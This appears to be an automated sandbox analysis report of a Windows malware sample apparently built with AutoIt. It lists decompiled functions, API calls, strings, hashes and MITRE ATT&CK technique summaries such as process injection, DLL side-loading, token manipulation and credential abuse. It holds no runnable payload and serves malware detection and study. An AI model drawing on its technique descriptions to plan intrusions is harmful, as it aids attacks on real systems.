Opcode Fuzzy Hash: d4c91ef109139bf73ab3efbed0bd4ad94d7c42662c5aa9018404e7bac7bd392f
Instruction Fuzzy Hash: 861159B6610209AFDB10DFA8CC45AEA7BF8EB08319F005914FD59E3150D634E8559B60

Function 00E3D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E3D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E3D7EB

Strings

<local>, xrefs: 00E3D7AB

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 87315734c3bf05c4ed4184874fbd6510360193a42b96b16f9be4179da7d3dff8
Instruction ID: 7565401007e9b9f5bb4639104cdd8e9aaed745cd48831fef625b69117a1f9413
Opcode Fuzzy Hash: 87315734c3bf05c4ed4184874fbd6510360193a42b96b16f9be4179da7d3dff8
Instruction Fuzzy Hash: 4511E9715092327DD7384B669C4DEF7BE9DEF127A8F10521BF509A3180D6749844D6F0

Function 00E275ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

CharUpperBuffW.USER32(?,?,?), ref: 00E2761D
_wcslen.LIBCMT ref: 00E27629

Strings

STOP, xrefs: 00E27623, 00E27628

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 418f09126d92149d1fb1dfb87ab4c26d8c05c27df3368808a5c0eee4bcf1ff2e
Instruction ID: bd870a02a97f23084d822e0f16d1783c7b4e6ad9437bedac1f6aa26ac636978f
Opcode Fuzzy Hash: 418f09126d92149d1fb1dfb87ab4c26d8c05c27df3368808a5c0eee4bcf1ff2e
Instruction Fuzzy Hash: 2D01D632A189378FCB20AEBDEC419BF73B5FF60754B501528E4A6E7191EB31D940D660

Function 00E2262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E22699

Strings

ListBox, xrefs: 00E22663
ComboBox, xrefs: 00E22638

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3bf9b219af5d755604a927ead3e81aef998591fe3c0e20086a18d80db3f6166f
Instruction ID: 2febbf801246a8225fb0323075a45d5e8eb50e66c1721a72ff72e71d4e0a8a06
Opcode Fuzzy Hash: 3bf9b219af5d755604a927ead3e81aef998591fe3c0e20086a18d80db3f6166f
Instruction Fuzzy Hash: 4D019276A40225ABCB05AB64DC52DFE7764EB46364B00161EF572B72C1DE3198098661

Function 00E22525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00E22593

Strings

ListBox, xrefs: 00E2255D
ComboBox, xrefs: 00E22532

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: dd459cdf15ef89ddf952895aa3b29c7332567cb751211fb26c3a16d5061790ee
Instruction ID: a66c99c410d4ada15e43d2a73b5ef14fe1e250411db00fd64f7793f3aa337c9c
Opcode Fuzzy Hash: dd459cdf15ef89ddf952895aa3b29c7332567cb751211fb26c3a16d5061790ee
Instruction Fuzzy Hash: 3A018475A801157BCB15E7A0D962EFE77A8DF45355F50501EB903B7281DB10DA0886B3

Function 00E225A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00E22615

Strings

ListBox, xrefs: 00E225E1
ComboBox, xrefs: 00E225B6

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 706e24c3dcbb4efac6f11c5ea376ea14165d1d2c0b09c42470b09f99e71b8681
Instruction ID: 373cda92db9b046e2dcb8e476183d357e21a518901b36accbd3a0378273c843c
Opcode Fuzzy Hash: 706e24c3dcbb4efac6f11c5ea376ea14165d1d2c0b09c42470b09f99e71b8681
Instruction Fuzzy Hash: 6B01F272A401157BCB15E7A0E802FFE33A8DB05344F14212EB903B7282DB61CE0882B2

Function 00E226B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E22720

Strings

ListBox, xrefs: 00E226ED
ComboBox, xrefs: 00E226C2

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 678bf29bf0c1c167486fe06f9f302658a948b2a733eac6b9e637b3e43ed826b7
Instruction ID: b9a374f4a53798d9a6cea9c23cfb1110e8d1cafe4894e2c4cd31b10a2dc5b1b5
Opcode Fuzzy Hash: 678bf29bf0c1c167486fe06f9f302658a948b2a733eac6b9e637b3e43ed826b7
Instruction Fuzzy Hash: C1F0D175A402257BCB15B7A49C42FFE73A8EF05364F402A1EF462B32C2DB6098088271

Function 00E59AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00E59B6D

Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E59B53

Strings

(, xrefs: 00E59B06

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (
API String ID: 982171247-2063206799
Opcode ID: d335e78b524b32d5faad84ecb511067034265ba2e4cf4a043f214e6dd6b5b6e6
Instruction ID: b30732492f808f5e97bde620a58515a1a195cc2a0ef5720b8b4eab5726754df4
Opcode Fuzzy Hash: d335e78b524b32d5faad84ecb511067034265ba2e4cf4a043f214e6dd6b5b6e6
Instruction Fuzzy Hash: 1E01D430105214FFDB25AF15EC44FA67B66FB8536AF100919FE022B1E1C7726819DB65

Function 00E58432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

GetWindowLongW.USER32(?,000000F0), ref: 00E58471
GetWindowLongW.USER32(?,000000EC), ref: 00E5847F

Strings

(, xrefs: 00E5843E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LongWindow
String ID: (
API String ID: 1378638983-2063206799
Opcode ID: a6cedab54ba94026846e701e9407ec98ca8b23734634e7f6f94c1b963ad4a15c
Instruction ID: 2534ac793515de73e18e8ac5825951bc8a73af5eb3b9a5a23b76a8cc0d5d649b
Opcode Fuzzy Hash: a6cedab54ba94026846e701e9407ec98ca8b23734634e7f6f94c1b963ad4a15c
Instruction Fuzzy Hash: 1DF04F31505255AFCB18EF69DC54D6A77A5EB86325B104A2EFE26E73F0CB309805DB10

Function 00E21461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E2146F

Strings

AutoIt, xrefs: 00E21463
Error allocating memory., xrefs: 00E21468

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: fb5261d7b3a47a594ed610724a6e9d40bf671bb3fbeca73c27512f43a4457195
Instruction ID: f101711b15aa96766bc41cc28256d8d0f8d5690289ba3b8abb0d6012b5823ffb
Opcode Fuzzy Hash: fb5261d7b3a47a594ed610724a6e9d40bf671bb3fbeca73c27512f43a4457195
Instruction Fuzzy Hash: 28E048312487653AD2253795BC07F85BA84CF45B56F11481AFB9CB94C24EE2259092B9

Function 00DE10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00DDFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DE10E2,?,?,?,00DC100A), ref: 00DDFAD9

IsDebuggerPresent.KERNEL32(?,?,?,00DC100A), ref: 00DE10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DC100A), ref: 00DE10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DE10F0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 5630a82818e7ce6d2f5e770aeed3099d4e18a4564a76deb16b05d20ac9ac13aa
Instruction ID: c0650c1769f516a4613fb3e087a7ce85d7d7edb00b6e4d5687573b417633700f
Opcode Fuzzy Hash: 5630a82818e7ce6d2f5e770aeed3099d4e18a4564a76deb16b05d20ac9ac13aa
Instruction Fuzzy Hash: 86E06D747003628FD730AF26E805702BBE4EB04345F048D1DE886D2751EBB5D488CBB2

Function 00DDF114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DDF151

Strings

h5, xrefs: 00DDF146
`5, xrefs: 00DDF131

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Init_thread_footer
String ID: `5$h5
API String ID: 1385522511-2563461917
Opcode ID: f34a6f212e5f6480a3ff0f72086834283369a04fef113930cb2b2f1534ebaf16
Instruction ID: b94d5d4998c1750ee4ef6ae795de7acf9b48f2c05334827872c9dbf4ee1c11e4
Opcode Fuzzy Hash: f34a6f212e5f6480a3ff0f72086834283369a04fef113930cb2b2f1534ebaf16
Instruction Fuzzy Hash: 5CE02631404A54CFCB00E73CE802E8833A0EB4C32CB360277E103A73D18B202E82CA34

Function 00E339D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E339F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E33A05

Strings

aut, xrefs: 00E339F9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 0f30ce95aac22dd1adfcb74b21ad7e8fca9064332c9c515ff99e5efde8174dd4
Instruction ID: bc38d9d68b8c01c111e495ec6561a97f0e78fa76a575e55b02837bbd6a5956f6
Opcode Fuzzy Hash: 0f30ce95aac22dd1adfcb74b21ad7e8fca9064332c9c515ff99e5efde8174dd4
Instruction Fuzzy Hash: C9D05B75544314ABDA34A7559C0DFCB7A6CDB44711F000591BA95A10A1DAB0D549C790

Function 00E52DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E52E08
PostMessageW.USER32(00000000), ref: 00E52E0F

Part of subcall function 00E2F292: Sleep.KERNEL32 ref: 00E2F30A

Strings

Shell_TrayWnd, xrefs: 00E52E01

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 712622d1ca6abc66f1f9685531e06c95033d3c04f71d23cc583f0ccce6911476
Instruction ID: 8d314af73af36b50da61203743ad008475e61ae51361740ac67df319ec7b17a3
Opcode Fuzzy Hash: 712622d1ca6abc66f1f9685531e06c95033d3c04f71d23cc583f0ccce6911476
Instruction Fuzzy Hash: A2D0A932389310AAE238B330AC0BFC22B64AB00B02F600C21B249BA0E0C8E0A800C644

Function 00E52DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E52DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E52DDB

Part of subcall function 00E2F292: Sleep.KERNEL32 ref: 00E2F30A

Strings

Shell_TrayWnd, xrefs: 00E52DC1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2b52317fbde724752b481b57384655d3bd22aac45edffbcc38ce7f6768fcb348
Instruction ID: 090d49bed58367402263e41ee05d141ed5dde07bec725567f1bf7b1f2cfc5c5b
Opcode Fuzzy Hash: 2b52317fbde724752b481b57384655d3bd22aac45edffbcc38ce7f6768fcb348
Instruction Fuzzy Hash: 3FD0A936388310AAE238B330AC0BFD22B64AB00B02F200C21B249BA0E0C8E0A800C640

Function 00DFC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00DFC213
GetLastError.KERNEL32 ref: 00DFC221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DFC27C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 53c1bdae00675ceadad86f6f5101a525c5556dd4f7aa00939ce53d5c22679a49
Instruction ID: 2adc7905ef8982cde0d52abbb92235a7927b55a03652cb3c2119c737228465e6
Opcode Fuzzy Hash: 53c1bdae00675ceadad86f6f5101a525c5556dd4f7aa00939ce53d5c22679a49
Instruction Fuzzy Hash: CC412C3061120DEFDB259FE5CA44BBA77A4EF11310F1AD169FA559B191EB308D20C774

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

